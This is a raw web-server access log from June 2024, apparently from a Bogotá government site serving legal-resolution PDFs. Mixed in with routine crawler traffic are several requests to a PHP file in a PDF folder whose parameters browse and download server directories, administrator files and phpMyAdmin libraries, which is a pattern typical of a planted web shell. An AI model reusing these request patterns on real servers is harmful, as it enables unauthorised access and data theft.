191.104.103.98 - - [28/Jun/2024:00:59:35 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:00:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX187psYFw9WvPXj17fFVK2NTh26rzReUXOG6CAQIj18xpN5rMXAVDSokAw99vTXtimeWzVFn9o1GBFousI55pRw7DJQuqIp7LSGem746WN5yoyBKG6n4I4R3cniN+aoeTnUKseNNp1G2HxDL39q14tmMzQIccCDNhio=&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:00:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18uaBbNuwCxVJ6L41DJZaFbMmnd947DGlfnzHflFN4u9QmVdXkCD5UD1J6jWVU+uBt9p98oVi4Cc00SyY63KXXyq1/tODT0RZwLUaEgKU9OvG/Lx+6N8MQmqsWuslhxpCPcJpG7r9S8voSAD1Dk6kXq6iUQUf8p+Ck=&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:00:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/CJJ7cvKjg9L5lUitUotpfh6etSWLX1NlR3jM5dDUmx9iZscYuulZeFZpUVgHWpMYA1XMc1nUd25a7sNEN3WXtasgo9vzBejCsPlnjdi4vZHkUr5ymw5y1gMJ2aW612+DeNmcEgbjA1kVYcLSzbDiGNOleFJC4Xqo=&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:00:59:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/Kxo1O3RU+5bH7hPfQQoo92niAYL/Kg9F27ngtTyqyG/v262MrDAXaEvvR28gNjIuG/nsO0dSx8POQ4YEJdEA+zNkip3oUWu4ba1YT85s+di82IlAtY+RMBG9287o+lqpBT55NPWuXL4VWuRJfznnQOcHnIHf0/fx51fgjC+rsQTvNJUfANnNuyqJv+bnjoO3/fSQhChtc2A==&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
216.245.221.92 - - [28/Jun/2024:00:59:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:00:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.139 - - [28/Jun/2024:01:00:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/1705.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:01:00:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4333.pdf HTTP/1.1" 200 463713
172.22.2.4 - - [28/Jun/2024:01:00:37 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2003%20de%2015%20de%20marzo%20de%202010.pdf HTTP/1.1" 304 -
18.116.205.62 - - [28/Jun/2024:01:00:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:01:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [28/Jun/2024:01:01:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1695.pdf HTTP/1.1" 200 4299927
52.167.144.139 - - [28/Jun/2024:01:01:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0897.pdf HTTP/1.1" 200 509328
66.249.66.12 - - [28/Jun/2024:01:01:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2767.pdf HTTP/1.1" 200 265265
66.249.66.13 - - [28/Jun/2024:01:01:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2462.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:01:01:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4062.pdf HTTP/1.1" 200 343543
201.245.192.253 - - [28/Jun/2024:01:01:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [28/Jun/2024:01:01:20 -0500] "GET /BLA/resoluciones/Autos%202008/2154.pdf HTTP/1.1" 200 288606
201.245.192.253 - - [28/Jun/2024:01:02:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:01:02:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1314.pdf HTTP/1.1" 200 569401
66.249.66.13 - - [28/Jun/2024:01:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202023/3479.pdf HTTP/1.1" 200 419310
66.249.66.13 - - [28/Jun/2024:01:02:20 -0500] "GET /Publicaciones/2024EE128752.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:01:02:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/2877.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:01:03:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:01:03:14 -0500] "GET /BLA/resoluciones/AUTOS%202012/2308.pdf HTTP/1.1" 200 266770
201.245.192.253 - - [28/Jun/2024:01:03:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:01:03:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4592.pdf HTTP/1.1" 200 337994
66.249.66.11 - - [28/Jun/2024:01:03:22 -0500] "GET /Publicaciones/2023EE239895.pdf HTTP/1.1" 404 228
66.249.66.13 - - [28/Jun/2024:01:03:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0170.pdf HTTP/1.1" 200 248951
172.22.2.4 - - [28/Jun/2024:01:01:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [28/Jun/2024:01:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202012/3093.pdf HTTP/1.1" 200 325023
201.245.192.253 - - [28/Jun/2024:01:04:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:04:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Jun/2024:01:02:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
66.249.66.13 - - [28/Jun/2024:01:04:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4531.pdf HTTP/1.1" 200 347029
216.244.66.195 - - [28/Jun/2024:01:04:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/3250.pdf HTTP/1.1" 200 399029
216.245.221.92 - - [28/Jun/2024:01:04:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:05:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:01:05:16 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [28/Jun/2024:01:05:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:01:05:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4690.pdf HTTP/1.1" 200 346513
216.244.66.195 - - [28/Jun/2024:01:05:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2346.pdf HTTP/1.1" 200 360754
3.20.63.178 - - [28/Jun/2024:01:06:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:06:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:01:06:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0195.pdf HTTP/1.1" 200 714822
66.249.66.12 - - [28/Jun/2024:01:06:24 -0500] "GET /BLA/resoluciones/AUTOS%202020/1923.pdf HTTP/1.1" 200 337159
66.249.66.13 - - [28/Jun/2024:01:06:24 -0500] "GET /BLA/resoluciones/AUTOS%202023/2342.pdf HTTP/1.1" 200 1525159
66.249.66.12 - - [28/Jun/2024:01:06:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3459.pdf HTTP/1.1" 200 216706
172.22.2.4 - - [28/Jun/2024:01:05:18 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61913
201.245.192.253 - - [28/Jun/2024:01:07:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:01:07:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2951.pdf HTTP/1.1" 200 437820
201.245.192.253 - - [28/Jun/2024:01:07:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:01:07:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4213.pdf HTTP/1.1" 200 337150
179.6.45.10 - - [28/Jun/2024:01:07:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/RESOLUCION%20311%20DE%202001.pdf HTTP/1.1" 200 398777
179.6.45.10 - - [28/Jun/2024:01:07:56 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.244.66.195 - - [28/Jun/2024:01:07:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1534.pdf HTTP/1.1" 200 316849
201.245.192.253 - - [28/Jun/2024:01:08:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:01:08:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3085.pdf HTTP/1.1" 200 768199
66.249.66.13 - - [28/Jun/2024:01:08:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0935.pdf HTTP/1.1" 200 445753
66.249.66.11 - - [28/Jun/2024:01:08:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0730.pdf HTTP/1.1" 200 778437
216.244.66.195 - - [28/Jun/2024:01:08:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1630.pdf HTTP/1.1" 200 302619
201.245.192.253 - - [28/Jun/2024:01:09:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:01:07:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:09:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.99.95 - - [28/Jun/2024:01:09:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5C&f=NOTICE&ft=download&white=1 HTTP/1.1" 200 1228
201.245.192.253 - - [28/Jun/2024:01:09:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Jun/2024:01:09:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2126.pdf HTTP/1.1" 200 291269
66.249.66.13 - - [28/Jun/2024:01:09:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4088.pdf HTTP/1.1" 200 355712
17.241.227.68 - - [28/Jun/2024:01:09:53 -0500] "GET /secretaria-de-ambiente-instalo-la-primera-etiqueta-vehicular-ambiental-eva-en-un-auto-particular-de-bogota.html HTTP/1.1" 200 945
216.245.221.92 - - [28/Jun/2024:01:09:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:01:08:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50303
201.245.192.253 - - [28/Jun/2024:01:10:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:01:10:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2341.pdf HTTP/1.1" 200 339877
47.128.37.249 - - [28/Jun/2024:01:10:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2580+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 17762
66.249.66.13 - - [28/Jun/2024:01:10:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5222.pdf HTTP/1.1" 200 353931
66.249.66.11 - - [28/Jun/2024:01:10:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4280.pdf HTTP/1.1" 200 328410
66.249.66.13 - - [28/Jun/2024:01:10:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3991.pdf HTTP/1.1" 200 6041047
47.128.112.74 - - [28/Jun/2024:01:09:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=resoluciones%286%29.csv&ft=edit HTTP/1.1" 200 1629910
216.244.66.195 - - [28/Jun/2024:01:10:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2488.pdf HTTP/1.1" 200 333291
47.128.121.28 - - [28/Jun/2024:01:10:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000231.tif&ft=download&white=1 HTTP/1.1" 200 233388
201.245.192.253 - - [28/Jun/2024:01:11:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.22.236.30 - - [28/Jun/2024:01:11:07 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.107 - - [28/Jun/2024:01:11:15 -0500] "GET /BLA/resoluciones/AUTOS%202024/01666.pdf HTTP/1.1" 200 411352
201.245.192.253 - - [28/Jun/2024:01:11:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:01:11:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20151-200/2002RES153.tif HTTP/1.1" 200 131202
66.249.66.12 - - [28/Jun/2024:01:11:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/3299.pdf HTTP/1.1" 200 415963
47.128.37.212 - - [28/Jun/2024:01:11:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+1818+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 180461
216.244.66.195 - - [28/Jun/2024:01:11:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2905.pdf HTTP/1.1" 200 438708
47.128.35.16 - - [28/Jun/2024:01:12:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=cleanup.lib.php&ft=download HTTP/1.1" 200 1438
201.245.192.253 - - [28/Jun/2024:01:12:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:01:12:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3113.pdf HTTP/1.1" 200 959332
66.249.66.13 - - [28/Jun/2024:01:12:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0373.pdf HTTP/1.1" 200 7198523
66.249.66.11 - - [28/Jun/2024:01:12:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1708.pdf HTTP/1.1" 200 286920
66.249.66.13 - - [28/Jun/2024:01:12:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4072.pdf HTTP/1.1" 200 359053
66.249.66.13 - - [28/Jun/2024:01:12:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/1123.pdf HTTP/1.1" 304 -
47.128.22.60 - - [28/Jun/2024:01:12:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+246+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 863893
52.167.144.207 - - [28/Jun/2024:01:12:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/2622.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:01:13:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.54 - - [28/Jun/2024:01:13:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+283+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 855701
201.245.192.253 - - [28/Jun/2024:01:13:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Jun/2024:01:13:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3231.pdf HTTP/1.1" 200 400063
66.249.66.12 - - [28/Jun/2024:01:13:34 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/isolucionsda/BancoConocimiento/D/Decreto3440deoctubre21de2004/Decreto3440deoctubre21de2004.asp?IdArticulo=340 HTTP/1.1" 200 527
66.249.66.11 - - [28/Jun/2024:01:13:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0775.pdf HTTP/1.1" 200 602464
47.128.47.72 - - [28/Jun/2024:01:13:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+888+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 35083
201.245.192.253 - - [28/Jun/2024:01:14:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [28/Jun/2024:01:14:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3284.pdf HTTP/1.1" 200 318139
201.245.192.253 - - [28/Jun/2024:01:14:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:01:14:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2890.pdf HTTP/1.1" 200 360396
20.15.133.173 - - [28/Jun/2024:01:14:25 -0500] "GET /robots.txt HTTP/1.1" 404 1018
20.15.133.170 - - [28/Jun/2024:01:14:36 -0500] "GET /Publicaciones/2024EE113912.pdf HTTP/1.1" 404 228
216.245.221.92 - - [28/Jun/2024:01:14:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:01:13:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:15:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:15:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:01:15:21 -0500] "GET /Publicaciones/2023EE309211.pdf HTTP/1.1" 404 228
207.46.13.125 - - [28/Jun/2024:01:15:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2626.pdf HTTP/1.1" 200 464609
